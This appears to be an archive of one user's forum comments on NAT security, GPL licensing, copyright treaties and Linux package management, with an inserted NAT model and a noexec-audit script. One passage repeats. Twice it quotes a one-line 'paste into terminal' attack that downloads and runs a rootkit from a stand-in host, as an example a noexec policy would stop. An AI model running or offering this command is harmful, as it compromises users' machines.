Re:Wow! think of all them IP addresses. on The Next Net · Score: 1
You are assuming that every packet that comes down your internet connection will have a destination IP address matching
No, I assume that my NAT box will drop any packets whose addresses don't match it. That is the case with my own NAT, although I suppose others could function promiscuously, although that would be contrary to the definition of NAT. (And it would be quite inefficient, as flooding the ethernet hubs inside NATs with all their neighbors' non-matching packets) If you think that many NATs disobey that definition, then you might submit corrections to pages like this and especially this.
your router's public IP address.
You are assuming I even HAVE a router. Router != NAT... routers expose the addresses of machines behind them, NATs hide these.
1. You are effectively placing the security of your LAN into the hands of your ISP.
1. For most people, who are (as I said) sadly clueless, that security is better than if they were plugging Windows XP directly into the internet.
2. The ISP already has its hands on security for most LANs. As the ISP, they are in a fine position to man-in-the-middle and replace any software you download with trojaned versions. Those security-conscious people who make sure that everything is downloaded encrypted are safe, but they are outside the class of user I was discussing.
In this situation other users can simply add a route to your LAN's address via your outside IP address and voilà, full access to your LAN.
Once again, relies on the assumption that a Network Address Translator will pass through untranslated packets.
The Berne Convention is that pesky treaty that allows any country to enforce its specific blend of copyright law anywhere in the world.
No. The USA, at least, was forced* to re-write some of its copyright laws to "follow the international standard" before it could join Berne. At the same time, some European countries were made to change their laws to match the USA, with the net effect being that both regions adopted the most restrictive parts of both their laws.
* I shouldn't quite say "forced". Rather, lobbyists for the USA's publishing corporations used "We've got to comply with the Berne standard" as an excuse to get stricter laws passed.
Re:Wow! think of all them IP addresses. on The Next Net · Score: 1
Not so, since NAT does not drop anything. If a totally unexpected packet arrives, NAT will simply not make any changes to the packet.
Fine, semantics. The packet is unmodified, so its address matches to none of the TCP/IP stacks on the LAN, so it gets dropped by every PC. Not rewriting an address is effectively dropping it (unless you somehow had a local machine with an IP identical to that of your NAT box on the Internet)
While in theory I think such a system would be useful it wouldn't help the users needing it most since they are too clueless to use it.
Of course, there must be UI guidelines in place so the default behavior is safer than we have now.
For example, assuming an OS-controlled privilege separation is working to the point where it is ensured that a program can perform high-speed 3d graphics, but not view any of your files, keyboard/mouse input, or screen/sound output from other programs. Then, it would be appropriate for any executable file a user clicks on in a web-browser to be installed that way.
If the program needs more access privileges (such as to read/write files to directories outside of where it was installed), then the system should display a large, threatening dialog box, "Warning, do you want to allow this, it could be harmful, blah blah, only if you trust this certificate-signer, blah blah". And, at the administrator's option, the user might not even have the ability to hand out those privileges at all... they would need to wait for the root user to approve the app.
(Naturally, this is a complex subject with many intricate problems. Just because I didn't list them all here doesn't mean the concern is unknown, or there aren't solutions)
Why would you go surfing the Internet for random pieces of software
Google is a better search engine than most any. Even for a random piece of information which I _know_ I have stored on my own hard drive, it's often faster for me to locate the original again on Google, rather than scanning my own disk.
when they are already under the icon labelled "install software" on your desktop?
Of all the software a user could install on her computer, 100% of it can be located on Google. Necessarily, the Synaptic list will be smaller, and have a greater chance of not containing the program she wants. (That is especially true if the program is either very new, or distributed through commercial sales, or both). And obviously, users tend to search for things where they can be found.
(Plus, the opening interface of synaptic is fairly hostile if your goal is to discover software to fit a need, instead of installing a package whose name and presence you already know)
Look, read the freakin' license, it specifically says that if you violate the license your rights under the license are terminated.
That is true, but irrelevant, so I will explain slowly:
1. I download Linux.
2. I modify and redistribute Linux. This would be a copyright violation, except that the license allows me to do so.
3. I violate the GPL license in some way. My permission to distribute modified copies goes away.
4. I stop violating the GPL license.
5. I download Linux again. It comes with a new license.
6. Since the new license I got hasn't been terminated, I proceed to distribute modified copies again.
Maybe you still think that because the first and second licenses I got are identical to each other (and to the widely-used GPL), that they are the same license. They aren't. Many kinds of licenses and contracts have identical boilerplate text, yet when they say "This License", they mean that license, not all other licenses sharing those terms. If the publisher sells you a second copy of her work with an identical license, you now have two licenses, and you can invalidate either of them by breaking its rules, while retaining the other.
That's it, there's no regaining the rights from someone else, the copyright holder has terminated your rights
True, if the copyright holder doesn't want to provide me her software under the GPL anymore, she is free to not give me any more copies. But as long as she (or anyone else) is providing new copies under the GPL, I can grab any of them and use it. (And obviously, it's virtually impossible for the original author to stop 3rd parties from redistributing, since she gave them explicit permission to do so by releasing it as GPL)
Even more so, countries like Australia (which is where I'm at BTW) specifically state that a copyright holder can terminate a license at any time and for any reason
If that were true, then Linus Torvalds would absolutely not accept patches from Australians. That would mean that an Australian who'd contributed a 5-line fix to Linux could point to any random person using that OS and demand him to power down and erase his bootloader. There would be no commercial use of Linux (or any software with an Australian contributor), because the risk that the programmer will spontaneously decide to revoke your license in the middle of operations is too large.
Look, read the freakin' license, it specifically says that if you violate the license your rights under the license are terminated.
Yes, I've read it. You violate it, your rights under the license are terminated. So then download one of the thousands of other copies with identical licenses from all over the internet, and proceed using it.
You might be confusing "this license" with "other licenses that are identical copies of this one". Those things are not the same, for copyright purposes at least. Each license file stands on its own.
specifically state that a copyright holder can terminate a license at any time and for any reason. The Berne Convention would permit me to exercise that right in any country that has signed the WIPO treaty
The Berne Convention does not allow for license termination in any way (without affirmative consent from licensee). Only if the work was copyrighted before your country became a Berne signatory might you have that ability, and only towards fellow citizens. (And Australia probably joined the treaty too long ago to be relevant to modern programming)
Hypothetically though, if you had modified a GPL program back before attaching to Berne, and if you then revoked your license, you would have violated the GPL, and no longer be allowed to distribute modifications of the original yourself. (Until, of course, you re-acquired a new GPL license, which you don't believe is possible)
Re:Wow! think of all them IP addresses. on The Next Net · Score: 1
It doesn't actually make any decisions to drop or accept packets.
If a totally unexpected packet arrives at a NAT (such as during a portscan attack), there is no reasonable way to guess which of the multiple local machines should receive it, so (by default) a choice is made to drop it. (Of course, by "choice"- the NAT isn't making a choice then, but rather the choice to drop all unexpected packets was made by the admin who installed a NAT in the first place)
That level of protection is useful for many people.
The principal use of the VCR was manifestly a fair use in the sense that it did not negatively affect the copyright owners' interests.
That's false. The principal VCR use is negative for the copyright owners, even if that use is merely time-shifting. Fair Use doesn't require zero economic harm, however- only that economic harm has been taken into account as part of the overall consideration.
Yesterday: keeping something you already got
Today: getting something you never had
So exactly who's complaining here?
The HBO network whose Sopranos and Deadwood you are watching without paying for a premium cable subscription. And all the broadcast-TV producers with plans of a DVD release someday in the future.
"We'll be back after these words fro-[[pause]]... [[unpause]]-lcome Back, everyone!..."
That approach requires the user to actually pay MORE attention to the commercials than she would otherwise, so it is not "easily done". Plus, if you are monitoring the commercials while the program is recording, then you are also watching the program as it airs, and not "time shifting" at all.
Projectile motion tells me that to fire a projectile in a near straight line over any meaningful distance, the velocity must be very high. What kind of projectile do you think can travel at the speed of a bullet and NOT be lethal?
Way to reverse cause and effect. They're not lethal because the bullet moves fast- the bullet is fast TO BE LETHAL.
What kind of projectile do you think can travel at the speed of a bullet and NOT be lethal?
The F-15 Eagle, or anything else with controlled deceleration.
Wrong. In the USA, drugs are legal. For every illegal drug you can name, I can list 99 legal ones. That's higher than the ratio of legal to illegal guns.
It would be easier for hardware makers to build an LCD display with a transparent backing that would allow crystal clear images on top of a completely transparent background.
Been done. I can't remember the company name right now (probably, they went bankrupt), but they sold a "folded LCD" monitor, which appeared as 2560x1024 to software, although in hardware it was two 1280x1024 LCDs on top of each other. Windows placed on the right half of your desktop would be visible on top of the pixel 1280 to its left, and the color white (or user-settable) was transparent on the foreground panel.
A very expensive gimmick of very limited application. (Oh, the front screen was touchscreen mouse-input too)
Re:Wow! think of all them IP addresses. on The Next Net · Score: 1
The only reason so many people use it today is because real address space is too limited.
Sadly, NAT is also heavily used as a security mechanism. Have you ever heard the line "Be certain to boot Windows XP behind NAT until you've at least downloaded service pack 2"?
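The NAT comments above disagree on whether an unsolicited inbound packet is "dropped" or merely left untranslated. The model below is an added illustration, not code from any poster or from a real NAT implementation; the addresses, ports and names (`Napt`, `run_cases`) are constructed, and it compares the two readings on three inbound packets: a reply to an existing mapping, a port-scan probe to the public address, and a packet routed straight at an inside address.

```python
"""Toy model of inbound handling in a port-translating NAT (NAPT).

Added illustration: every address, port and name here is constructed.
The model ignores remote-endpoint filtering and mapping timeouts.
"""
from dataclasses import dataclass, replace
from typing import Dict, Optional, Set, Tuple

PUBLIC_IP = "203.0.113.7"                                # constructed WAN address
LAN_HOSTS: Set[str] = {"192.168.1.10", "192.168.1.11"}   # constructed inside hosts


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class Napt:
    def __init__(self, public_ip: str, forward_untranslated: bool) -> None:
        self.public_ip = public_ip
        # True  = "NAT does not drop anything", untranslated packets go to the LAN
        # False = packets without a mapping are discarded at the NAT box
        self.forward_untranslated = forward_untranslated
        self._next_port = 40000
        self._by_inside: Dict[Tuple[str, int], int] = {}
        self._by_public: Dict[int, Tuple[str, int]] = {}

    def outbound(self, pkt: Packet) -> Packet:
        """Rewrite the source to the public address, creating a mapping if needed."""
        key = (pkt.src_ip, pkt.src_port)
        if key not in self._by_inside:
            self._by_inside[key] = self._next_port
            self._by_public[self._next_port] = key
            self._next_port += 1
        return replace(pkt, src_ip=self.public_ip, src_port=self._by_inside[key])

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """Return the packet placed on the LAN, or None if nothing is forwarded."""
        if pkt.dst_ip == self.public_ip:
            inside = self._by_public.get(pkt.dst_port)
            if inside is not None:
                # Known mapping: rewrite the destination to the inside host.
                return replace(pkt, dst_ip=inside[0], dst_port=inside[1])
        # No mapping, or not addressed to the public IP at all.
        return pkt if self.forward_untranslated else None


def delivered_to(pkt: Optional[Packet]) -> Optional[str]:
    """A LAN host's stack accepts a packet only if dst_ip is its own address."""
    if pkt is not None and pkt.dst_ip in LAN_HOSTS:
        return pkt.dst_ip
    return None


def run_cases(forward_untranslated: bool) -> Dict[str, Optional[str]]:
    nat = Napt(PUBLIC_IP, forward_untranslated)
    out = nat.outbound(Packet("192.168.1.10", 51000, "198.51.100.20", 443))
    reply = Packet("198.51.100.20", 443, out.src_ip, out.src_port)
    scan = Packet("198.51.100.99", 4444, PUBLIC_IP, 22)        # no mapping exists
    routed = Packet("198.51.100.99", 4444, "192.168.1.11", 22)  # inside address as dst
    return {
        "reply": delivered_to(nat.inbound(reply)),
        "scan": delivered_to(nat.inbound(scan)),
        "routed": delivered_to(nat.inbound(routed)),
    }


if __name__ == "__main__":
    for policy in (False, True):
        print("forward_untranslated =", policy, run_cases(policy))
```

The probe to the public address reaches no host under either reading, which is the "effectively dropped" point; the two readings differ only for the packet addressed directly to an inside host, so that case depends on a deny rule for unmapped traffic on the outside interface rather than on translation itself.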
Re:no to flash! on The Next Net · Score: 3, Informative
don't be silly, anyway they're talking about the net, not the web, ie, the infrastructure, not formats of files that could be transferred over it.
No. IETF spends more of their time on file content than byte-pushing "infrastructure". For example, the HTML format is IETF RFC 1866. Any file that's mainly viewed over the internet is potential IETF fodder.
(Flash is too old and too intentionally openness-hostile to ever become an IETF standard, of course. But it'd be good if it could be replaced by something which is a standard, maybe SVG)
For normal users installing software, a GUI effectively doesn't exist if it's outside of the "Google path". That is, they will search Google for the software, and find either a direct-download link, or a store offering to ship it for money. Either way, they acquire an install file, click on it, and the install GUI begins.
Because synaptic is outside the distrib flow chain of most software publishers, it is so far off the radar it might as well not exist. (You can't go to the homepage for Firefox or OpenOffice and get instructions "look for it in synaptic first, if you have synaptic, and if you know what the root password is").
Who is "scared of Linux" because Synaptic is too hard?
Synaptic isn't a very nice GUI. In particular, deb packages can have interactive questions embedded in them, which are handled within a popup xterm. Until synaptic manages to 100% swallow those as X11 dialog-boxes, it won't even qualify for what most people call "GUI"
PS. Synaptic could be tremendously improved if it got another pane replacing the package list, which showed only those packages most potentially interesting to desktop end-users, with a colorful icon and 3 line description for each. Something like a top-forty, with a weekly "Editor's Pick" and "New Releases".
Yeah, there might be some distros offering this kind of automated package management to even non-paying users now, but I can't see how they can keep that up if people generally take a free-lunch approach.
The first distros to offer that service did it for free, long before "commercial Linux support" became an active marketplace.
However, you have a point. Although that time and effort isn't passed onto users directly (because the volunteers are generous), the fact that they need to spend all that time means (a) the rate their users can get new software is slowed, and more importantly (b) those volunteers are spending their time on maintenance busy-work, instead of REALLY improving the distro.
The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security of the userbase as well as providing installation ease of use.
The Linux model is minorly better than the Windows system, but that's not enough to really deserve pride. ("Vote for me! I'm not as evil as Saddam Hussein!")
Requiring software to be combed over by the distro-team before it makes it to your desktop is error-prone and degrades the progress of software development. The adoption of new and highly superior competitive packages is slowed, because people continue to use whichever one their distro has an existing packaging relationship.
Far better would be a finely-grained choice about trusting a program. Privilege separate. Today, users can decide only to (a) not execute a program at all, or (b) execute a program with all the rights I have, including reading/writing all my files.
A system akin to the Java "sandbox" should be extended for general program use, so a user can download and execute (for example) a free game demo from an unauthenticated publisher, and be sure it won't compromise her account- and not because a slow, fallible human audited the code, but because the speedy local OS prevented it from touching any resources beyond what it legitimately required.
If the Windows Paradigm was broken people would not use Windows.
And if tobacco was harmful, people would not smoke cigarettes.
The worldview that "something which even approximately works today never needs to be changed" is a depressing one, and if followed, would've prevented the development of automobiles, airplanes, steamships, etc.
Uh, I'm just saying that the Linux community ought to learn from the mistakes of the proprietary software community instead of going along for the ride.
No, you aren't saying that. You are advocating Linux follow Microsoft's example.
Autopackage is 100% against how the proprietary software world works. In proprietary software (which basically means "Microsoft Windows software"), there is no such thing as a package manager, a package format, or dependency analysis. There are no "packages", just "installers", which are completely arbitrary programs that users execute to (hopefully) install something, but which might be doing anything else.
It's meant to aid the installation of packaged software from third party sources and manage dependencies in order to accomplish this. That is specifically my problem with it, it is a tool for enabling dangerous behaviour for unexperienced users.
The factor blocking the deployment of "malware" to Linux isn't the intractability of Linux software installing, but the low population size of unskilled users, and the low exploitation value of that population (same as the largest reason there are few "viruses").
Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere)
If a system administrator feels his users at risk of installing malware, she is well able to disallow execution of files in their home directories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side-effect. (An admin with this attitude would also disallow users from running autopackage at all, of course)
Well, here in the US, drugs are illegal.
Wrong. In the USA, drugs are legal. For every illegal drug you can name, I can list 99 legal ones. That's higher than the ratio of legal to illegal guns.
AC: This would get us past the unnecessarily high cost of verifying an author's death + the nonsense of determining if a work is owned by a corporation.
It will also reduce the slaughter of hapless authors by fanfic writers who want their source material to become public domain faster.
If 70 million daily visitors don't take them down, I doubt that 250,000 more are going to make much of a difference.
If Microsoft had just that day released a 400 megabyte downloadable critical service pack... anything goes.
Or wait until it is night / dark / light etc.
Take 24 pictures spaced throughout the day, then install a utility to swap your wallpaper to the matching image every hour.
Synaptic. Already there.
No it isn't.
For normal users installing software, a GUI effectively doesn't exist if it's outside of the "Google path". That is, they will search Google for the software, and find either a direct-download link, or a store offering to ship it for money. Either way, they acquire an install file, click on it, and the install GUI begins.
Because synaptic is outside the distrib flow chain of most software publishers, it is so far off the radar it might as well not exist. (You can't go to the homepage for Firefox or OpenOffice and get instructions "look for it in synaptic first, if you have synaptic, and if you know what the root password is").
Who is "scared of Linux" because Synaptic is too hard?
Synaptic isn't a very nice GUI. In particular, deb packages can have interactive questions embedded in them, which are handled within a popup xterm. Until synaptic manages to 100% swallow those as X11 dialog-boxes, it won't even qualify for what most people call "GUI"
PS. Synaptic could be tremendously improved if it got another pane replacing the package list, which showed only those packages most potentially interesting to desktop end-users, with a colorful icon and 3 line description for each. Something like a top-forty, with a weekly "Editor's Pick" and "New Releases".
Yeah, there might be some distros offering this kind of automated package management to even non-paying users now, but I can't see how they can keep that up if people generally take a free-lunch approach.
The first distros to offer that service did it for free, long before "commercial Linux support" became an active marketplace.
However, you have a point. Although that time and effort isn't passed onto users directly (because the volunteers are generous), the fact that they need to spend all that time means (a) the rate their users can get new software is slowed, and more importantly (b) those volunteers are spending their time on maintenance busy-work, instead of REALLY improving the distro.
The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security of the userbase as well as providing installation ease of use.
The Linux model is minorly better than the Windows system, but that's not enough to really deserve pride. ("Vote for me! I'm not as evil as Saddam Hussein!")
Requiring software to be combed over by the distro-team before it makes it to your desktop is error-prone and degrades the progress of software development. The adoption of new and highly superior competitive packages is slowed, because people continue to use whichever one their distro has an existing packaging relationship.
Far better would be a finely-grained choice about trusting a program. Privilege separate. Today, users can decide only to (a) not execute a program at all, or (b) execute a program with all the rights I have, including reading/writing all my files.
A system akin to the Java "sandbox" should be extended for general program use, so a user can download and execute (for example) a free game demo from an unauthenticated publisher, and be sure it won't compromise her account, and not because a slow, fallible human audited the code, but because the speedy local OS prevented it from touching any resources beyond what it legitimately required.
If the Windows Paradigm was broken people would not use Windows.
And if tobacco was harmful, people would not smoke cigarettes.
The worldview that "something which even approximately works today never needs to be changed" is a depressing one, and if followed, would've prevented the development of automobiles, airplanes, steamships, etc.
Uh, I'm just saying that the Linux community ought to learn from the mistakes of the proprietary software community instead of going along for the ride.
No, you aren't saying that. You are advocating Linux follow Microsoft's example.
Autopackage is 100% against how the proprietary software world works. In proprietary software (which basically means "Microsoft Windows software"), there is no such thing as a package manager, a package format, or dependency analysis. There are no "packages", just "installers", which are completely arbitrary programs that users execute to (hopefully) install something, but which might be doing anything else.
. It's meant to aid the installation of packaged software from third party sources and manage dependencies in order to accomplish this. That is specifically my problem with it, it is a tool for enabling dangerous behaviour for unexperienced users.
The factor blocking the deployment of "malware" to Linux isn't the intractability of Linux software installing, but the low population size of unskilled users, and the low exploitation value of that population (same as the largest reason there are few "viruses").
Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere)
If a system administrator feels his users at risk of installing malware, she is well able to disallow execution of files in their home directories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side-effect. (An admin with this attitude would also disallow users from running autopackage at all, of course)
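One way to audit the policy described in the comment above, as an added example that is not part of the original post. It assumes execution is blocked with the `noexec` mount option (the comment does not say how); the function name, the watched paths and the sample mount table are constructed for illustration.

```shell
#!/bin/sh
# Report user-writable paths whose effective mount still allows execution.
# Input text uses the /proc/mounts layout: device mountpoint fstype options dump pass

# Constructed sample mount table (not taken from a real host).
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /home ext4 rw,nosuid,nodev,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0'

# $1: mount table text; $2: space-separated paths to check (assumed policy).
# Prints "<path> on <mountpoint>" for each path whose covering mount lacks noexec.
exec_allowed_paths() {
    printf '%s\n' "$1" | awk -v watch="$2" '
        NF >= 4 { c++; mp[c] = $2; opt[c] = "," $4 "," }
        END {
            n = split(watch, w, " ")
            for (i = 1; i <= n; i++) {
                best = 0; bestlen = -1
                for (j = 1; j <= c; j++) {
                    m = mp[j]
                    # a mount covers the path if it is /, the path itself, or a parent
                    covers = (m == "/" || w[i] == m || index(w[i], m "/") == 1)
                    # longest mount point wins; on ties the later (over)mount wins
                    if (covers && length(m) >= bestlen) { best = j; bestlen = length(m) }
                }
                if (best && index(opt[best], ",noexec,") == 0)
                    print w[i] " on " mp[best]
            }
        }'
}

WATCHED="/home /tmp /var/tmp /dev/shm"
exec_allowed_paths "$SAMPLE_MOUNTS" "$WATCHED"
# On a live Linux host: exec_allowed_paths "$(cat /proc/mounts)" "$WATCHED"
```

In the sample, `/var/tmp` is flagged because it has no mount of its own and inherits the options of `/`, which is the case a check of only the listed mount points would miss.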